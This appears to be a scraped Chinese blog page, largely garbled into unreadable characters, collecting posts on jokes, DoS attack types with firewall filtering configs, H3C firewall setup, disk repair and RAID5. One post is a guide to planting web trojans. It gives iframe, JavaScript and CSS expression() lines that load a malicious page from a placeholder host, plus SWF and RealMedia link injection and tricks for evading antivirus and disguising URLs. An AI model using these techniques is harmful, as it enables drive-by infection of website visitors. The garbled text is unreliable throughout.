anti-security

��Ӿ�Ĺ�Ѫ̨�ʺͳ��......

panhc007 — 2009-12-01 10:01

1��ӽ��վ��һ��һŮ��ҵ��Ա�
Ů��“��ʵ��ˣ��ʹ��Ů��”
�У�“��û�ͻ�ô”
Ȼ��߶��뿪��

2��Ů��ϲ��ڽ�ͷ�ȿ��ȣ��ģ��һ��Ŀ��
�У��ǣ��㱾��˸��ǧ�谮��Ů�ӡ�
��ʱ��׵�45��ġ��ǳ��졢��ţ��......

3��ݳԷ� �Ա��ү��С�Ƴ��¾Ʋ� ��˵��˾�Ϊ��ҽŲ��ͻȻ��ү��˵��˵��ӵĻ��Ѿ��˵���Ĵ��
��ʱ�Ҿ�˹�ʹ��ˡ��

4��У԰��һ��ε��ͬŮ�ѳ��:
��һ��ӣ��
��Ҳ��
��
��
��ݣ�ת��ȥ��
��һ��§ס��
��Ժ��˵��

5��ϻس��͡��һ��尢��
��Ȼ��һ�°��̱��˵“��ô��ô��顫��”
��ɬ��Ц�ˡ��
..................................��ó��.........

6��˸��Ҵ��к��˵��ϲ�� "��ʹ" ô��
��û��Ӧ��, ��˵�ˣ��ô��ǵ�һ��ܽ��ĸ裬

��֪��Ƿ�Ҳһ��
�Ҷ߶��µ��ˡ�

7��һ��Ů��ҹ��Ӵ�绰��

��ᣬ��Ϊ��˯�ˣ��ʵ��͵��
Ů��ƽ��꣬��Ǿ��
�У��ʲô��֣�
Ů��ɺ�,��Ϊ˭��ˣ�
�У��cao��Ѳ��ң�
�ұ�Ц��

8��
�У��˰��
Ů��Ĵ�
�У��˰��ǳ��˰�

9��ʵ��װ�Ƶ�Ī��Һ�ͬѧ�Ĵ��ͻȻ��һ�䣺��ʵ��Ƕ��˵�С�ޣ��Զ��ڽ��˿ڡ�
�ҿ��ʱ��ɫˢ�ľͰ��ˣ��Ѿţ��Ҵ��ֱ��Ϊ�з��

10��ĳ��ѧУ�ڰ��䣮��֮��,ѭ��ȥ,��һ��һŮ��
��:��ҽ��
Ů:�Ҳ��Ҳ��,��!
��:�㲻Ҫ��,��ҽ��ʹ�ʱ��סŮ��
Ů:�ſ��!��ӣ��ת��Ҫ�ߣ�
��ʱ,��һ�ѽ�Ů��뻳��,�ȶ�ǿ��ϣ�Ů��,��˫�ۻ�ס�в��ӣ�
��ĬĬ·��ͬʱѰ��δ��

11��ĳ�ڿ�һװB��վ��
��ʦ��XXX!��վ��
B�У��ں��ſ��
��ʦ��ô��
B�У��Ұ��ע��㣡��˰��ң��ҿ�ֵ�ü�ǧ��
ȫ�඼45�ȵ��̱�ˡ�ȫ��ϺǺ��MLGB��

12��ǰͿ� �ҵ��һ��ŵ ��Ⱥ��װ��Ҳ�Ŀ��ʱ��Ĵ��ҵ��iphoneɲ�Ǽ� ��ǰͿ˱�һ�׸߿��ֱ��ġ��֮�ϡ�� ʱ ��Щ�ǰͿ��װ�� ʼ“��ɹ�ţ��”

13��һ��90��С��׷��ѵ��¡�һ90��С����粻��Ҳͦˮ�顣��Ѳ�Ҫ��Ǻܲ��⡣��˵��ͨ��ܡ�

��¡��Ѿܾ�С��ʱ��Ƕ��ڡ��ѹ��С��ıȽϴ��ܾ��ǽ�һ��ί�񡣺��С��ˡ��ĵĿ��ѣ��촽��˾䣺
“��ҡ��Ϊʲô�ر��䣿”��ˡ�

��׺�ν��ͨ��ܡ��ʱ��ţ��桭��

14��ϣ�ĳ��ѧ¥��¥��һ��һŮ��ַ��֡��еı��Ů�ģ�Ů��ޣ��Ѿ��ڽ��·��ǡ��˴�ʱ˵��Ƿ��ְɡ�
Ů��û��˵��ֻ��ؿ��еġ�
�еĴ�ʱ�Ѿ�ת��ͷ��ˣ��Ů��ˣ�Ȼ��è��һ��߹�ȥ��סŮ��˵��Ҵ��á��ɵ�ϣ��ô��ã�

15��ǵ�һ��ϵ��С��ĳ��Ҿܽ��绰N�κ󣬷��Զ��ţ�“�ҵ��ֲ��ĥ��ġ��κ��˶��޷��⣬��ֻ��ϵۿ��Դ��Һ��ҵı��ˣ�ֻ��ԡ��”

16��ĳ�� Ƥ��ͷ�� ǰ��
A: �ֵܣ��һ��ǰ�� ֻ��Ǹ��ӣ��㶮��
B��Ҷ��ˡ�
A��㲻�� Ǹ��Ĵ�Ư��ӣ��Ǹ�Ƽһ��.....�޾��.....
˾��ûɲ��϶�ʱ��һ��ˡ��

����¼(Ц��) �鿴��

��N�ַ��

panhc007 — 2009-11-27 09:16

1) HTML��
��HTML��һ��ҳ�в��һ��iframe��䣬��鿴վ��Ƿ񱻹ң�һ��ǲ��һ�¹ؼ��iframe��
(2) ��һ��ľ��js��ˡ�
��ԭ��ҳ��д��horse��jsд��һ��Ϊ document.write('http:\/\/www.xxx.com\/horse.html'>;��רҵһ��д�� top.document.body.innerHTML = top.document.body.innerHTML + '\r\nhttp://www.xxx.com/horse.htm/">';��2��д��Ҫע�⣺��ԭ��ҳ��Ҫ��body��ǩ��
(3) �� css�й��
��css��д�룺
body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + '\r\nhttp://www.xxx.com/horse.html/">');
}
Ȼ��ҳ�е��CSS��http://www.7747.net/css.css" rel="stylesheet" type="text/css">��ġ��csdn �ж�expression�Ľ��ǣ�IE5��Ժ�汾֧��CSS��ʹ��expression��CSS��Ժ�Javascript��ʽ�� CSS��Կ��Ԫ�ع��е��ԣ�Ҳ��Զ��ԡ�Ҳ��˵CSS��Ժ��һ��Javasccript��ʽ��CSS��Ե�ֵ�� Javascript��ʽ��Ľ��ڱ��ʽ�п��ֱ��һ��Ԫ��Ժͷ��Ҳ��ʹ��ʽ�ͺ��Ԫ�ص�һ�� Ա��һ��͹ؼ��expression��css��js��䣬��ǿ��ڹ��д��ֵ��Զ�̵��ã��ز��ԡ�
(4) ��swf�й��
��һЩswf��Ĺ��ߣ��ù��滻ԭ��ҳ�е�swf�򵥶��swf��Է��һ��Ե��һ��ʾswfҳ��ҳ��ҳ�в��swf��﷨һ��ʽΪ��
http://www.7747.net/xxx.swf" quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60>
(5) ��Ӱ��ļ��й��
��蹤��RealMedia Editor��򿪹��ߺ�Ȼ��ѡ��ļ��Realý��ļ��Ȼ��ѡ��Ҫ�༭��Ƶ�ļ��ʽ��RealOne��˾��RM�� RMVBΪ��չ��ļ��ţ��½�һ��ı��u 00:00:10:0 00:00:30.0&_rpexternal&&http://www.xxx.com/horse.htm
(00:00:10.0��Ƿ��һ�¼��ʱ�䣬��ü��ҳ��00:00:30.0ͬ��ǵڶ��η��ʱ�䣬��0ʱ0�ֵ�30��0΢��ʱ��ڣ��URL��ַ��ָ��ľ��ַ��)
��Ϻ󲢱��棬Ȼ��ѡ�񡰹��ߡ��ϲ��¼��ղŵ��ı��ϲ��ɺ��ѡ��ı��Real�ļ��Ϊ��ü��ɡ�
��ɵ��Ƶ�ļ��ϣ��Է��ۿ�ͬʱ�ͻ��ӵ��ָ��ľ��ַ��

2��ļ��
��Ҫ��ԣ��ҵ�ʱ��ܳ��SWF��JS��RM�й��ǱȽ��ˣ��ǻ��õ�Щ��ɡ�
(1)Զ��׺ִ��HTML
��԰�horse.html�ĳ�horse.jpg֮��ĺ�׺��Ȼ��д��jsҲ��ԣ��Ϊ�� js�Ĳ�Ҫ��׺��ԡ�
(2)JS�ļ��
Ϊ�˱��ҳľ��Ĵ��룬��԰�JS��ݼ��ܣ��ܶ㿪ɱ��á��ʹ��ENCODE��ܷ�ʽ��ܺ��JS�� ˷��⣬��ķ��
(3)URL�ı��
URL�ı��η��Ҳ�кܶ࣬��罫url��16��ת��Ϊencod��ȡ��漰��URL��ƭ�ķ��͸��ˣ��URL��ƭ��@�ļ��ɣ�IE��Ѿ��򲹶��ˡ��и�©��Ȼ��Ч��£�
http://www.baidu.com">>

http://www.google.cn" target="_blank">

��ô��Ϊ��ҳ��ƶ��Google��ʱ��IE״̬��ʾ��http://www.google.cn��Ӻ�ȴ��http://www.baidu.com�� վ��IP��ַ��ʵ��Ļ��IP��ַҲ��Խ��ת��ġ��127.0.0.1��IP��Ա�Ϊ2130706433�� 0x7f.0x00.0x00.0x01��0177.0000.0000.0001�ȵȣ��ֻ��8��ơ�10��ơ�16��ơ��ת��ѡ�
��Hacker Information �鿴��

��繥��

panhc007 — 2009-11-26 15:02

Smurf��

Smurf��ֹ��ĳ��Smurf��ġ��ֹ��ʹ��IP��ƭ��ICMP�ظ��ʹ��紫��Ŀ��ϵ ͳ��Ŀ��ϵͳ�ܾ�Ϊ��ϵͳ��з��Smurf��ͨ��ʹ�ý��ظ��ַ��ó��ܺ��Ĺ㲥��ַ��ICMPӦ��(ping)��ݰ��û�ܺ� ��յ��¸��Դ�ICMPӦ��𸴣��Ӹ��ӵ�Smurf��Դ��ַ��Ϊ��ܺ��ߣ��յ��µ��

++++++++++++++++++++++++++++++++++++

Fraggle��

Fraggle����Smurf��˼򵥵��޸ģ�ʹ�õ��UDPӦ��Ϣ��ICMP��
��ǽ�Ϲ��˵�UDPӦ��Ϣ��
��CISCO��ASAΪ��
class-map fraggle -------------��˿ںź�Э��
match port udp eq echo
policy-map fraggle --------------��ƥ��,��Ϊ1
class fraggle
set connection conn-max 1
service-policy fraggle interface inside ----------------�ڽӿ��Ӧ��
++++++++++++++++++++++++++++++++++++

land��

land ����һ��ʹ��ͬ��Դ��Ŀ��Ͷ˿ڷ��ݰ��ĳ̨��Ĺ��ͨ��ʹ��©��Ļ��
��Land��У�һ��ر��SYN��е�Դ��ַ��Ŀ��ַ��ó�ĳһ��ַ��ʱ��½��ܷ��Լ��ĵ�ַ��SYNһACK��Ϣ��ַ�ַ��ACK��Ϣ��һ��ӣ�ÿһ��Ӷ��ֱ��ʱ��Land��Ӧ��ͬ��UNIXʵ�ֽ�� Windows NT ��ļ��仺��Լ��ӣ��
++++++++++++++++++++++++++++++++++++++++++++++++

WinNuke��

��WinNuke��һ�־ܾ��񹥻��
��WinNuke��ֳƴ��⴫�乥��ǹ��Ŀ��˿ڣ��Ŀ��˿�ͨ��139��138��137��113��53��URGλ��Ϊ��1��ģʽ��
��ⷽ��ж��ݰ�Ŀ��˿��Ƿ�Ϊ139��138��137�ȣ��ж�URGλ�Ƿ�Ϊ��1��
��ʵ��÷��ǽ�豸��·��Ϳ��Է�ֹ��ֹ��ֶΣ��ݰ��ֹ��ƣ��¼�¼��ʱ�䣬Դ��Ŀ��MAC��ַ��IP��ַMAC��
++++++++++++++++++++++++++++++++++++++++++++++++++

Teardrop��

Teardrop��һ�־ܾ��񹥻��
��Teardrop�ǻ��UDP�Ĳ�̬��Ƭ��ݰ��Ĺ��乤��ԭ��򱻹�� Ͷ��Ƭ��IP��IP��Ƭ��ݰ��а��÷�Ƭ��ݰ��ĸ��ݰ��Լ��ݰ��е�λ�õ��Ϣ��ĳЩ��ϵͳ�յ��ص�ƫ�Ƶ�α��Ƭ��ݰ�ʱ ��ϵͳ��󡣣��UDP��ʱ�ص�ƫ�ƣ��ݰ��еڶ�ƬIP��ƫ��С�ڵ�һƬ��λ�ƣ��ϵڶ�ƬIP�� Data��Ҳδ��һƬ��β��ص��󡣣��©��ϵͳ��ܾ��񹥻��յ��е��Windowsϵͳ�ᵼ�� ʾSTOP 0x0000000A��󡣣�
��ⷽ��Խ��յ��ķ�Ƭ��ݰ��з��ݰ��Ƭƫ��Offset��Ƿ��
��ϵͳ��򣬶��յ��Ĳ�̬��Ƭ��ݰ��ֹ��ơ�
++++++++++++++++++++++++++++

Tiny Fragment

Tiny Fragment
��˼Ϊ��СƬ�Ρ��һ�ֳ��Ĺ��ֶΣ��ھ��
��һ��С�� TCP ��Ƭ��һ�� TCP ��ݰ��ͷ��Ϣѹ��һ��Ƭ�С��ɵ��¹��ͨ�ŵ�·��Կ��ܰ��ݵĺ��Ƭ��
��е�TCP/IP Э����ݰ��м��һ��쳣��С��ݶ��п��ܵġ��ݶ��㹻��С��ҿ��԰� TCP ��ݰ��е�һЩͷ��Ϣ��ѹ�ɵڶ��ݶΣ��˵��Щ��Ĺ��˹��֮��ƥ�䡣��ڹ��в��ִ�м�С��ݶΣ��Ƿ��ݰ��ͨ�� Ϊ��˹��޷�ƥ�䡣ÿ��ģʽ��ܹ�ת�� 68octets ��ݱ��һ��ķָ��Ϊһ��ͷ��Ϣ��ܸߴ� 60octets��С��ݶν�Ϊ 8octets ��
+++++++++++++++++++++++++++++++++++++++++++=

IPSpoofing��

��ص㣺��ַ��ð��α��IP��ַ��ͱ��
��ڵ��Χ
+++++++++++++++++++++++++++++++++++++++++++++

UDP��ˮ

��UDP flood��
��ָ��ļ�ð��ü򵥵�TCP/IP��Chargen��Echo��ͺ��ô��ռ��ݡ�ͨ��α��ĳһ��Chargen��֮��һ�ε�UDP��ӣ��ظ��ַָ��Echo��һ̨��̨��֮��㹻��㹻��ͻᵼ�´��ķ��񹥻��
��ص��Ҫ��TCP/IP��񣬻��߶Է��ǽ��Internet��Щ��UDP��
++++++++++++++++++++++++++++++++++++++++++++++++

syn flood

SYN Flood�ǵ�ǰ��е�DoS��ܾ��񹥻��DdoS��ֲ�ʽ�ܾ��񹥻��ķ�ʽ֮һ��һ��TCPЭ��ȱ�ݣ��ʹ��α��TCP��󣬴Ӷ�ʹ�ñ��Դ�ľ��CPU��ɻ��ڴ治�㣩�Ĺ��ʽ��
Ҫ��ֹ��Ļ��ԭ��Ҫ��TCP��ӽ��Ĺ��̿�ʼ˵��
��Ҷ�֪��TCP��UDP��ͬ��ǻ��ӵģ�Ҳ��˵��Ϊ��ڷ��˺Ϳͻ��֮�䴫��TCP��ݣ��Ƚ��һ��·��Ҳ��TCP��ӣ��TCP��ӵı�׼��ģ�
��ȣ��ˣ��ͻ��ˣ��һ��SYN��־��TCP��ģ�SYN��ͬ��Synchronize��ͬ��Ļ�ָ��ͻ��ʹ�õĶ˿��Լ�TCP��ӵĳ�ʼ��ţ�
�ڶ��յ��ͻ��˵�SYN��ĺ󣬽��һ��SYN+ACK�ı��ģ��ʾ�ͻ��˵��󱻽��ܣ�ͬʱTCP��ű��һ��ACK��ȷ�ϣ�Acknowledgment��
��ͻ��Ҳ��һ��ȷ�ϱ��ACK��ˣ�ͬ��TCP��кű��һ��һ��TCP��ɡ�
��ϵ��ӹ��TCPЭ��б��Ϊ��֣�Three-way Handshake��
��ͳ��TCP��ӵ��У��һ��û��SYN��ĺ�ͻȻ��ߣ� ��ô��ڷ��SYN+ACKӦ��ĺ��޷��յ��ͻ��˵�ACK��ĵģ��޷��ɣ��·��һ��ԣ��ٴη�� SYN+ACK��ͻ��ˣ��ȴ�һ��ʱ��δ��ɵ��ӣ��ʱ��ĳ��ǳ�ΪSYN Timeout��һ��˵��ʱ��Ƿ��ӵ��ԼΪ30��-2��ӣ��һ��û��쳣��·��һ��̵߳ȴ�1��Ӳ��ʲô�ܴ��⣬�� һ��Ĺ��ߴ��ģ��˽�Ϊ��ά��һ��ǳ��İ��б��ķǳ��Դ----��Ƶİ��ӣ��ʹ�Ǽ򵥵ı��沢�� Ҳ��ķǳ��CPUʱ��ڴ棬�ο��Ҫ��϶��б��е�IP��SYN+ACK��ԡ�ʵ��TCP/IPջ��ǿ��Ľ�� Ƕ�ջ��---��ʹ��˵�ϵͳ�㹻ǿ�󣬷��Ҳ��æ�ڴ��α��TCP��Ͼ��ǿͻ��󣨱Ͼ��ͻ��˵�� ʷǳ�֮С��ʱ��ͻ��ĽǶȿ��ʧȥ��Ӧ��ǳ��ܵ��SYN Flood��SYN��ˮ��
�ӷ��Ƕ��˵��м��ּ򵥵Ľ��
��һ��SYN Timeoutʱ�䣬��SYN Flood��Ч��ȡ��ڷ��ϱ��ֵ�SYN��ֵ=SYN��Ƶ�� x SYN Timeout��ͨ��̴ӽ��յ�SYN��ĵ�ȷ��Ч��ӵ�ʱ�䣬��Ϊ20��£��͵�SYN Timeout��ÿ��ܻ�Ӱ��ͻ��ʣ��Գɱ��Ľ��ͷ��ĸ��ɡ�
�ڶ��ַ��SYN Cookie��Ǹ�ÿһ��ӵ�IP��ַ��һ��Cookie��ʱ��ܵ�ĳ��IP��ظ�SYN��ģ��϶��ܵ��˹��Ժ��IP��ַ��İ��ᱻ��
��ַ��ֻ�ܶԸ��Ƚ�ԭʼ��SYN Flood��SYN Timeoutʱ��ڶԷ��Ƶ�Ȳ��ߵ��Ч��SYN Cookie��ڶԷ�ʹ��ʵ��IP��ַ��/��ٶȷ��SYN��ģ�ͬʱ��SOCK_RAW��дIP��е�Դ��ַ��ϵ� ��֮�ء�
��Hacker Information �鿴��

2012�ر��ָ��

panhc007 — 2009-11-26 13:54

��2012��12��21��һ˵��鲻�ϣ��˵��硡��2012��ⲿ��Ӱ��չʾ��2012��λ��ˣ��һ��ÿ�˱ر�� ĩ��ָ�ϡ��Բ��Ų��ţ��ڽ��3��ʱ��ھ��һһ��ɰɣ��Է��һҲ��^^��

1��Ҫѧ�Ὺ �� Ȼ��ֹ��С��ϰ��°࿪��Ҫ��2012��һ��ܹ��ѽγ��ܳ��õ��ϳ��ԽҰ�ɳ��ѧ���ܣ��δ�� Ը��꣬�Ǿ͸Ͽ��߻Ὺ�ɳ��£��ϵ�ɡ�

2��Ҫѧ�Ὺ��ַɻ��ǲ��Ҫ��ڡ�רҵ��Ƭ�еļ̸��ѧ��һ�� ͺá��ɻ��ܹ�Խ��Խ�ã��δ��Ը��꣬��Ҳ��Ͽ�ͽ��߻Ὺ�ɻ��ˡ�

3��㲥�еĹ�� ̨��ᵽ��ı��ĩ�յ��ݣ��ò��Ա��ϵ��ڻĽ�Ұ��ҲҪ�ҵ��ܵõ��벻��

4�� Ȼ��Ҳ��Ծ��ʶһ��ѧ��ѧ�ҵȿ�ѧ�ң��ϵ�㹻�û��ܴ��ȡ��һ��Ϻ��Ϣ��

5��ѧϰ�� ԣ��֮ʱ�Ա㹵ͨ��ر��ǲ��

6��ͨ��;��֪��ȣ��Ƭ��Ǽ�ְ��һ��Σ��ͷ��ܱ�� FANS�ϳ��һ��

7��һ��ֻ��Ȼƽʱ��ղ��źţ��ĩ�յ��ͷ��޴�ϲ��ȫ��缸 ��ˣ��Ȼ�п��ֻ��ͨǧ��֮��˰��ѵĵ绰Ȼ��һ��µĸ�ף��Ƭ�е��ʿ�ѧ��ص�ѩɽ�Ͻӵ�� Ѵ�ӡ�ȴ��յ绰��

8��ڹ�ϵ��ʱ�̣��˼��˺��ˣ�˭��š��ԣ��콻��ѣ��Ǹ�� ˸��ѡ�

9��û�²�Ҫ��ں��ϣ��뵺��غ��У��Ѵ��ͻ�ɽ��û�¾�ȥϲ��ɽ�ϴ��ţ��п�� ܻ��

10��塣�ܹ�Ӧ��캮�ض��Ļ��ˮ��Ҫ�㹻�á��ܲ��׷��ɵķɻ��

11�� ݣ�Ũ�̺ͻ��׷��㣬��㿪��ɻ��ٿ��Խ��ϰ����һ��Ҫ��Լ��ҧ��ұ��۾�ʹ��ǰ�壬��ɹ��Σ�� ġ�

12��и��Ƹ��ȥϲ��ɽ��޽��ȡ��˹��
����Ʒ�� 鿴��

H3C secpath��ǽ͸��ģʽ��

panhc007 — 2009-11-26 10:23

��˵��
����ǽ��͸��ģʽʱ��ǽ��Ϊ͸��ţ��ǽ��Ŵ��ڲ�ͬ��Ϊ��ǽ�յ�IP��ĺ󣬻ᵽ�ϲ��ع��˴��⻹�ɷ��飬��ACL��顢ASPF״̬��ˡ��顢��صȹ��ܡ��ǲ��еġ�

��ʵ��
1��÷��ǽ��͸��ģʽ��䣩
[Secpath]firewall mode transparent

2��÷��ǽ�Ĺ��IP��ַ��˵�ַ��TELNET��SNMP�����С�
[Secpath]firewall system-ip 192.168.1.1 255.255.255.0

3��÷��ǽ��δ֪Ŀ��MAC��ַ��IP��ĵĴ��ʽ��Ĭ��á�arp��ʽ��㲥��鲥��ǲɡ�drop��ʽ��
[Secpath]firewall unknown-mac flood

4��ο��ֲᡣ

��ע����
1��͸��ģʽ��ǽ��ĳ�ӿڽ��յ��㲥֡��ಥ֡ʱ��ӿڽ��ת��MAC��ַ��ɹ��ת��
2��ͬһ��ϣ�͸��ģʽ��ǽ�Դ�֡��й��ˣ��ת��֡��MAC��ַ��ɹ��󣬲�ת��
3��Ŀ��δ֪��MAC��ַ֡��͸��ģʽ��ǽ��͸�֡��Դ�ӿ��нӿڽ��ת��MAC��ַ��ʧ�ܺ�ת��
4��MAC��ַ�ķ��ʿ��б��ֻ��͸��ģʽ��á�
5��͸��ģʽ�£�MAC��ַ��ϻ��ʱ��300�롣
��huawei��缼�� 鿴��

Ӳ�̻��޸�

panhc007 — 2009-11-23 15:48

Ӳ��ʹ�þ��ˣ��п��ܳ��ָ��ָ��⣬��Ӳ��“��”����⡣��ڱ��ڣ��ɽ�Ӳ��õ��̳��ָ��ô��أ��Ǳ��ά��ά��Ӳ�̵�һЩ��ϣ��ܶ��ά��Ӳ��

һ��Ӳ�̳��ֻ��
Ӳ�̻��Ϊ�߼��֣�ǰ��Ϊ��ͨ��Ϊ��ʹ�ò��ɵģ��޸��Ϊ��Ի��Ӳ�̴ŵ��ϲ��ˣ�ֻ��ͨ��Ӳ�̷��ʹ��Ҳ��Ӳ��л��ˣ�

��ȣ��ڴ򿪡��л򿽱�ĳ��ļ�ʱӲ�̳��ֲ��ٶȱ��п��ܳ�ʱ��ɹ��Ϊ��ʱ��“��”ĳһ��ͬʱ��Ӳ�̶��죬��ɴ�Windowsϵͳ��ʾ“�޷��ȡ��д��ļ�”��Щ��ɱ��Ӳ��ĳ��ֳ��˻��

��Σ�ÿ�ο��ʱ��Scandisk��̳��Զ��У��϶��Ӳ��Ҫ�޸��Ҫ��󣬱��绵��иó��ʱ�粻��˳��ͨ��Ӳ�̿϶��л��Ȼ��ɨ��ȻҲ��ͨ��ֺ�ɫ��“B”��ǣ��Ҳ�л��

��ʱӲ��޷��̻��ɿ��Ӳ��̷��޷��Ը��в��ɴ�Ϳ��̷��Ӳ��Ͽ��ܳ��˻��翪��Լ��У��Ļ��ʾ“Hard disk drive failure”“Hard drive controller failure”��Ϣ��ж�ΪӲ��Ӳ�̿��Ӳ��ϣ��дӲ��ʱ��ʾ“Sector not found”��“General error in reading drive C”��ƴ��Ϣ��Ӳ�̴ŵ��ˡ�

��󣬵��г��“��ļ��”��⣬Ҳ��ܺ�Ӳ�̻��йء�

��Ӳ�̻��ά��
Scandisk��ɨ��ǽ��Ӳ��߼���õĹ��ߣ��ǳ��Format���ܶ��κ�Ӳ�̻��޲��ã��ס��Ӳ�̳��˻��ǿ��Windowsϵͳ��£��“�ҵĵ��”��ѡ��Ҫ��Ӳ��̷��ѡ��“��”��ڳ��ֵ�“��”��ť��ѡ��“��״̬”��“��ʼ��”��“ɨ��”��ѡ“ȫ��”��“�Զ��޸��”��“��”��Ȼ��“��ʼ”�ȿɣ��Ӳ��ȫɨ�账��ҶԿ��ܳ��ֵĻ��Զ��Σ��DOS״̬�£�Ӳ��л��ʱһ��Զ��Scandisk��ɨ�裬��Ժڵ׺��ֵ�“B”��bad��Ȼ��ϵͳ��ʱ��д��ɨ��Ѳ��ܽ��Windowsϵͳ��Ҳ��̻��Ժ��Ӧ��̷��£��“A��”��Scandisk *��ע��*ΪҪɨ��Ӳ��̷��س��Ӧ��Ҫɨ��޸��Ӳ�̷��

��ŵ�ٹ��е�NDD“��ҽ��”��Pctools��ع��߶�Ӳ�̽��ɨ��Ҳ��޸�Ӳ�̻���õķ��÷��ܼ򵥣��౨��Ҳ�н��ܣ��ҿ��һ�¡�

��Ӳ��ϳ��޷��޸��Ļ��ػ��ҿ��һЩ��Щ��Ϊһ��Ӳ��ӳ�ʹ��

��һ����һ��4.3GӲ��2G��ص��Format��ʽ��в��ȥ��Scandisk��NDD��Ҳͨ��һ��ʽ��Smart Fdisk��Ժ󣬽��̷�A��и��ִ��ļ�Sfdisk.EXE��Ȼ��ɾ��DEL��ԭ�з��Ӳ��ϵ��λ�á��籾��У��Ƚ��1990M�Ļ��ٸ�ʽ��󲢼��Ȼ��ٰѻ��ֳ�Լ50M��߼��ٽ��ʣ��Ӳ�̿ռ��Ϊһ��߼��ÿ��ٸ�ʽ��ܽ��ٸ�ʽ��ٽ��Ǹ�Լ50M�Ļ��ڵ��ɾ��DEL��ˡ�Ȼ��һ��Ӳ�̾ͺܿ챻�޺��ˣ��Ժ��ͷ��Ҳ��ȥ��Щ��ɾ��˵Ļ��ˡ�

����Windowsϵͳ�Դ��Fdisk��һ��1G��Ӳ�̣��ڸ�ʽ��10%ʱ��˳��ͨ��ʱ��Ctrl+Breakǿ��ֹ��Fdisk��һ��90M��DOS��ΪC�̣�Ȼ��ٽ��һ��20M�߼��D��ٽ��µ�800��M��һ��߼��E��˳�Fdisk��Format E��10%ʱ��谭��ʱ��Fdisk�ٽ��һ��88M��E�̡�10M��F�̣��µ�790M��ΪG�̡��ظ��Ĳ��ֱ��ɡ�Ȼ��Fdisk��10M��D��F��ɾ��ʱ��µľ��û�л��ĺ��ˡ�

��ͬ��PartitionMagic��DiskManager�ȴ��Ҳ��Ĺ��PartitionMagic��PartitionMagic4�е�“check”��Windows�еĴ��ɨ��ɨ��̣��Ӳ��ϵ�λ�ã�Ȼ��Operations�˵��ѡ��“Advanced/bad Sector Retest”��ѻ��Ӳ�̷ֳɶ��ٰѻ��ڵķ��أ��Windows��ͨ��Hide Partition�˵��ʵ�ֵġ��Ҳ�ܱ�֤��ػ��Ӳ�̵��ʹ�ã��ϵͳƵ��ȥ��д��Ӷ��չ��

ϵͳ��ʾ“TRACK 0 BAD��DISK UNUSABLE”��˼Ϊ“��ŵ��𻵣�Ӳ��޷�ʹ��”��ô��ɨ��ɨ��Ӳ��ʱ��0��ֺ�ɫ“B”��Ӳ��0��𻵣��Ǵ�ұȽ�ͷʹ�Ĺ��ϣ�һ��ϵ�Ӳ��ϴ��ʵ��һЩ��ѱ��ϵ�0��ε��1��ȡ��֮��Ч��Pctools9.0��NU8�ȡ�

��һ����Ǿ��Pctools9.0Ϊ��˵��һ��2.1GӲ�̳��ϣ��Ժ��Pctools9.0Ŀ¼�µ�DE.EXE�ļ��ѡ��˵�Select�е�Drive��ȥ��Drive type��ѡPhysical��ո�ѡ��ٰ�Tab��л��Drives�ѡ��hard disk��Ȼ��OK�س��ص��˵��Select�˵��ʱ��Partition Table��ѡ�н��Ӳ�̷��Ϣ��Ӳ��ҵ�C��÷��Ǵ�Ӳ�̵�0��濪ʼ�ģ��ô��1��Beginning Cylinder��0�ĳ�1�Ϳ��ˣ��˳��Ժ�Del��COMS��ã��“IDE AUTO DETECT”��Կ��CYLS��782��781��˳��·��ʽ��Ӳ�̣�ʹ��

��ŵ��NU8.0Ҳ�Ϻ��á��һ��1.28GӲ�̳��0�ŵ��𻵹��ϣ��NU8��߰�Ŀ¼��NORTON.EXE��Ȼ��ѡ“��”RESCUEѡ��Ը�Ӳ�̵��Ϣ��б��ݡ��ѡ��“��̱༭��DISKEDIT”��ɹ��к�ѡ“��OBJECT”��ѡ“��”��ɼ��Ӳ�̵Ĳ��£��SIDEΪ0-63��CYLINDERΪ0-255��SECTORΪ1-63��¼�ͷ��Ϣ��Ӧ��0��0��1��Ҫ��¾��ǰ��C�̵��ʼ��0��0��1��Ϊ0��1��1��ƶ��ֹ��޸ļ��ɡ��Ҫ˵�ľ��ǣ��Ķ��ֵҪ��ݾ��̺��˳��ԣ��Format��ʽ��Ӳ�̼��ʹ��ˡ��Ҫ�ر��ǣ��޺ú��Ӳ��һ��Ҫ��DOS�µ�Fdisk�ȷ��߶��·��ָı�Ӳ�̵��ʼ��档

��ϸ��ж��Ч��ô�͵�ʹ��Դ��Ӳ�̵͸��Ӳ�̳��͵ĵ͸��DM��Lformat�ȶ�Ӳ��ȫ�̽��еͼ��ʽ��ˣ��ɶ�Ӳ�̵�һЩ��ų�
���� 鿴��

raid5�齨

panhc007 — 2009-11-23 15:46

raidģʽ��࣬��ҵ��ʵ��ǰ�2��ϵ�Ӳ��һ��һ��ã��Դﵽ��ٶȺ͸��ߵİ�ȫ�ԣ��Ҳ��Ҫ�˽�̫��raidģʽ��ֻҪ֪��raid0��raid1��raid5��㹻�ڷ��ҵ�췹�ˣ��ʵʲôҲ��֪��췹��Ҳ�ࣩܶ��νraid0��Ӳ�̺ϳ�һ��Ӳ��ã��80G��Ӳ�̣��raid0ģʽ��ͱ��һ��160G�Ĵ�Ӳ�̣��Ӳ�̴��ٶ�Ҳ�ӱ��ģʽ��ȫ�Ժܵͣ�һ��һ��Ӳ�̻��ˣ��Ӳ��ݶ��ᱨ��˷��ò��ģʽ��

��νraid1��Ӳ�̻��ͬ��ݣ��񣩣��80G��Ӳ�̣��raid1ģʽ��80Gû�仯��Ӳ�̴��ٶ�Ҳû�仯��Ӳ��ݱ��ͬ��ȫһ��һ��һ��Ӳ�̻��ˣ��һ��Ӳ�̣��Ȼ��У��ģʽ�ܰ�ȫ��ںܶ��еͶ˷��ȡ��raidģʽ��ģʽ��ʵ�ã��ò��ߵ�Ӳ��ɱ��ʵ�֣��Һ�ϲ��raid5��ȥһֱ�Ǹߵ��ר��ʹ��ڽ��죬�㷭��Ʒ��ļ�Ŀ��1��2��Ԫ�Ĳ�Ʒ��Ҳ��ٵ�raid5��Ӱ��raid5��Լ��raid0��ٶȡ��raid1�İ�ȫ�ԣ��Ǹ��Ĵ��з��

��

��Ӳ��raid5�齨��

����ָ�һ��װ��һ̨��˫��P4 820D��8Ӳ�̵�1U��ʽ�洢�ͷ��װ��У��ֱ��齨��Ӳ��Raid5��Raid5�Ĵ��У��̺�ֵ��ζ��д��ϸ��ù��̣��ש��񣬸��Ҵ��һ��

